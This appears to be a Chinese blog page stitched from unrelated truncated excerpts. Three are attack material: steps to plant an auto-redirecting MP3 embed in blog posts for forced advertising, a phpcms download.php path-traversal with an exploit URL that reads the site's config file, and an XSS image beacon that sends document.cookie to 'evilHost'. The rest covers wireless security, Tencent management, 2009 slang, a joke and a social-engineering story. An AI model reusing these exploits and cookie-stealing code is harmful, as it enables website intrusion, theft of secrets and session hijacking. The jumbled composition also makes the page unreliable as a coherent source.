Chinadu`s Blog

信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
文章作者:eskry
前一段时间一直在研究网站暴力推广
在研究通过博客暴力推广时略有所得
和大家分享下
这次会利用到一个小工具
就是前一段时间很多人所说的MP3 0day
我写了一个利用工具
给几个朋友也玩了几个月了
这次也一起放出来吧
没什么技术含量,大牛飘过吧
该方法理论上通杀所有支持源码编辑的博客
具体利用方法如下:
先用随文附带的利用工具生成一个MP3文件
地址中填自己要挂广告的网址
将MP3文件上传到自己的空间里
把MP3文件网络链接地址记下
然后进入新浪或网易等博客
写一篇日志
选择源码编辑模式
在当中加入
<EMBED height=1 type=application/x-mplayer2 align=baseline pluginspage="" width=1
src=http://127.0.0.1/test.mp3 ALLOWSCRIPTACCESS="samedomain" BORDER="0" AUTOSTART="1"></EMBED>
http://127.0.0.1/test.mp3 替换为你的MP3文件网络链接地址
点击日志
就会自动转向你指定的页面
一次暴力广告推广就成功了

点击下载

漏洞文件download.php

PHP代码：

< ?php
require dirname(__FILE__).'/include/common.inc.php';

$a_k = phpcms_auth($a_k, 'DECODE', AUTH_KEY); //注意!!
if(emptyempty($a_k)) showmessage($LANG['illegal_parameters']);
parse_str($a_k);

if(isset($i)) $downid = intval($i);
if(!isset($m)) showmessage($LANG['illegal_parameters']);
if(emptyempty($f)) showmessage('地址失效');
if(!$i || $m<0) showmessage($LANG['illegal_parameters']);
if(!isset($t)) showmessage($LANG['illegal_parameters']);
if(!isset($ip)) showmessage($LANG['illegal_parameters']);
$starttime = intval($t);

$fileurl = trim($f);
if(!$downid || emptyempty($fileurl) || !preg_match("/[0-9]{10}/", $starttime) || !preg_match("/[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}/", $ip) || $ip != IP) showmessage($LANG['illegal_parameters']);

$endtime = TIME - $starttime;
if($endtime > 3600) showmessage('地址失效');
if($m) $fileurl = trim($s).trim($fileurl);

if(strpos($fileurl, '://'))//远程文件
{
header("Location: $fileurl");
}
else//本地文件
{
if($d == 0)
{
header("Location: ".SITE_URL.$fileurl);
}
else
{
$fileurl = file_exists($fileurl) ? stripslashes($fileurl) : PHPCMS_ROOT.$fileurl;//此处可能为物理路径
$filename = basename($fileurl);
if(preg_match("/^([\s\S]*?)([\x81-\xfe][\x40-\xfe])([\s\S]*?)/", $fileurl))//处理中文文件
{
$filename = str_replace(array("%5C", "%2F", "%3A"), array("\\", "/", ":"), urlencode($fileurl));
$filename = urldecode(basename($filename));
}
file_down($fileurl, $filename);
}
}
?>

function file_down($filepath, $filename = '')
{
if(!$filename) $filename = basename($filepath);
if(is_ie()) $filename = rawurlencode($filename); $filetype = fileext($filename);
$filesize = sprintf("%u", filesize($filepath));
if(ob_get_length() !== false) @ob_end_clean();
header('Pragma: public');
header('Last-Modified: '.gmdate('D, d M Y H:i:s') . ' GMT');
header('Cache-Control: no-store, no-cache, must-revalidate');
header('Cache-Control: pre-check=0, post-check=0, max-age=0');
header('Content-Transfer-Encoding: binary');
header('Content-Encoding: none');
header('Content-type: '.$filetype);
header('Content-Disposition: attachment; filename="'.$filename.'"');
header('Content-length: '.$filesize);
readfile($filepath);
exit;

其实$i,$m,$f,$ip等都是地址栏的参数没有过滤(在down.php中可以看到)由parse_str($a_k)解释后得到的,又由于$a_k 是经phpcms_auth($a_k, 'DECODE', AUTH_KEY)解密后才能得到参数,但我本地测试构造$a_k变量的加密值不成功就换了个方法,把$a_k构造成不存在的参数然后下面的$i,$m,$f,$ip我就直接从地址栏中添加!测试如下:

http://www.xxxx.cn/download.php?a_k=Jh5zIw==&i=20&m=2&f=../include/config.inc.php&t=2233577313&ip=119.123.178.19&s=m/&d=1

浩瀚的大海，深邃的崖洞，在一片银白的沙滩上，膝盖上放着笔记本的您正姿态优雅地在躺椅上查看最新的股价信息、足球资讯，正在享受自由、可移动、随时随地的无线网络所带来的无限空间。突然，鼠标停滞，屏幕模糊，系统瘫痪，随即自动关机，在那一刹那，您的第一感觉是什么?没错，病毒、黑客，或者是木马!

　　这就是无线网络的两面性。一方面，它可以带给用户飞一般网上冲浪的感觉，而另一方面，它也可以带给用户不确定的网络安全。和有线网络一样，病毒、黑客、蠕虫，木马、间谍软件，随时都在威胁着无线网络的安全，并且无线网络比有线网络更容易遭侵害，因为用户在使用无线网络时的安全意识和掌握的技术手段还比较差。不能因为有人用枪杀人而停止枪的生产，同样不能因为无线网络会带来安全隐患而不去推广无线网络的使用。其实，无线网络安全隐患并不可怕，只要掌握一些基本的无线网络安全技术，就完全可以畅游网络而不惧病毒。

　　网络：加强安全防范迫在眉睫

　　在书房呆累了，小明抗着笔记本来到了客厅，奇怪的发现上网的速度怎么突然变快了?难道远离了AP(AP 在书房)上网速度还更快?当然不会，这是因为由于客厅离隔壁的书房较近的原因，小明无意间访问了邻居的无线网络，而邻居申请的网络速度比小明的快所致。我们假设，小明接着访问了邻居的共享磁盘，正好磁盘里有银行卡密码、投标书、个人日记，甚至是一些个人图片，结果会怎么样?

　　为了让更多的人可以访问到，无线网络选择了通过特定的无线电波来传送，在这个发射频率的有效范围内，任何具有合适接收设备的人都可以捕获该频率的信号，进而进入目标网络一个员工在公司阳台也可以访问公司网络，但这同时也意味着，蹲在公司阳台下面的竞争对手的情报人员也可以访问公司的网络，畅通无阻，而这个人拿着笔记本，也可以到全国各地的竞争对手阳台下去拿一些情报。
阅读全文...

cookie窃取是最常见的跨站攻击之一，不管是用img,iframe方式，还是基于入库型或非入库的XSS，整个操作只需要带Cookie浏览器请求了某个的url即可完成。

本人偏爱Image：

img = new Image(); img.src = "http://evilHost/get.asp?cookie=" document.cookie;img.width=0;img.height=0

盗cookie脚本：

还是一个比较简单的程序，经过一点完善，在获取Cookie同时也记录的时间和IP，比较智能化与人性化，务求达到一个更好的用户体验，呵呵！

get.asp
code:
阅读全文...

马化腾带着一大批产品高管自上而下，持之以恒地推动产品本位的管理体制规范化，并不断地创新和优化这套体制，使得整个公司上上下下融入了“产品的基因”，最终成就了“产品的腾讯”。

1、设置一个质量监控小组，由经验非常丰富的高Level的产品人员构成，赋予他们很大的权力，去监控和规范所有的产品项目。并且用KPI来制约产品项目服从这些规范。为了不搞教条主义，很多规范都是在立项之初，由项目经理和这个小组共同确认的，未必是硬性指派，一经确认就受到严格监控。确保好的规范不流于空喊口号。

2、每个产品都设置公开的反馈论坛，突出外部入口，积极征询用户意见，并以内部轮班方式回复“每一条”有价值的反馈，要求以“人对人，面对面”的沟通态度来进行解答，禁止机械问答。公司高层（包括小马哥）不定期巡查每一个产品论坛，一旦发现有不认真回复用户的情况，立即予以训诫。确保产品人员与用户长期保持近距离接触。

3、每个产品都设置内部的交流平台，分为两部分，一块类似留言板，由产品主管发布项目的进度、动态；另一块是论坛，向公司内部所有人开放，接纳反馈。在腾讯内部已经形成了非常活跃的氛围，甚至以该平台人气高涨为荣（至少你主管会喜欢这个），利用这个平台跨项目提意见，或是项目组内部交流思维碎片都很常见，达到了群策群力，内部监督的效果。
阅读全文...

2009年，一些猥琐的人让我们笑过，一些和谐的事让我们疼过，一些流行语也像雷阵雨一般划过我们的视野，楼主归纳总结了一些精辟而经典的句式，尽所能的查阅史料，究其根源并对其点评，或许多少可以折射出“2009寂寞年”那些迅猛窜红于网路的事物的本质。

以下流行语排名不分先后

1， 不要迷恋哥，哥只是个传说
探究：2009年3月25号，一名为“不要迷恋哥”的猫友发出了一篇标题为《不要迷恋哥，哥只是个传说》的帖子，还在贴内额外附送了两张让人蛋疼的照片~

原文如下：这个世界创造了哥，是为了我们能够更好更多的去崇拜、尊敬、同时也给大家创造了一个美好的向往，人们常说人有了希望，生活才有了奔头，生命才活的的更有价值。如果反之，那么哥的存在只能是一种祸害。亲们，如果是这样的话，哥也会心不安的。

为了我们的美好未来，为了我们幸福的家庭，不要迷失自己，更不要盲目的迷恋，更多的我们要理解、要尊敬，才不会辜负哥带给你们的这种美好的情怀。同 时，我 更要谢谢给创造了能让亲们和哥进行心理交流的猫扑（现实生活中毕竟我们不能肆意畅怀的去和人讨论自己有多么迷恋和喜欢哥），我们可以肆无忌惮的畅所欲言， 把我们真实的情感和对哥的喜爱怀念都写下来和亲们一起共享，真希望我们能同时在线一起聊我们的共同的话题，愿亲们永远幸福快乐，好梦成真！

不要迷恋哥，哥只是个传说！哥早已不在江湖，江湖上却流传着哥的传说……

此贴一出，立时引起了猫扑高管们的重视，大家一致认定此贴必火，果不其然，在众高管踊跃跟帖之下，也引发了猫民的跟帖热潮，同一时间PS，恶搞接踵 而 来。。。“不要迷恋哥，哥只是个传说”的句式也在网友中广泛流传。“不要迷恋哥”自恋式的幽默以及那两张霸气逼人的照片，在沦为笑谈的同时，也注定成为一 个传说。。。

相似句式：不要恶搞姐，姐让你吐血；不要迷恋妹，妹才十九岁；不要迷恋锅，锅是平底锅。。。

出处：http://dzh.mop.com/topic/readSub_9437857_0_0.html
源头点击率：2750W+
源头回帖数：4480+
阅读全文...

PS：绝世猛鸡，惊天一柱！

点击: CONTINUE 播放

有一个男的出差在外面，突然回家，在门口听到有男人打呼噜的声音。
男的默默走了开，发了个短信给老婆：“离婚吧！！！”
然后扔掉手机卡，远走他乡……
三年后他们在一个城市再次相遇。
妻子问：为何不辞而别？
男人说了当时的情况。
妻子转身离去，
淡淡的说：那是瑞星的小狮子

前景分析：
22岁的刘昉在高中辍学后，先后做过食品销售、商场员工、电子设备维护员等，这些经历使得他精于与各式各样的人打交道。但在接下来的5年，他疯狂的迷上了计算机，尤其对黑客技术感兴趣，并涉足了地下黑客经济。他接的业务很多，如对私服的DDOS、编写针对性的网银键盘记录工具、游戏装备盗取洗钱等。
但刘昉对重复性攻击感到厌倦，显然，有刺激的事物往往令人更感兴趣。这次，他盯上了一套防火墙，由北京中关村恒天公司研发。据说这套防火墙一公布便在业界大受好评，刘昉则不以为然，在他看来，防火墙的源代码才能说服他。

一、销售部门的后门
刘昉从对外公布的防火墙软件中的菜单栏“帮助”处找到了恒天公司销售部与市场部的联系电话，接着他

便以某公司采购部经理的身份拨通了恒天公司销售部的电话。

恒天公司（以下简称恒）：“您好，这里是恒天公司销售部”
刘漂阳（以下简称刘）：“嗯，我是北京亚太机电股份有限公司采购部经理刘漂阳，我们公司需要500份防火墙软件产品，我参考了网上的防火墙横向评测，再三考虑后决定选择你们的产品，现在我想知道你们给我的价格是否令人满意。”
恒：“刘经理，我们的防火墙有三种不同的版本，分别为个人版、专业版和企业版。如果你选择企业版，它的单价是88元，总价为4.4万；如果你批发购买、那么价格相对优惠，仅3.2万。”
刘：“嗯，没有高于我们公司原始估价，不过我们公司网络环境相当复杂，你们公司是否可以定制一套，实现封堵公司员工聊天与下载的功能？”
恒：“这个……请让我问问软件开发部，请稍等。”
刘：“好的”
阅读全文...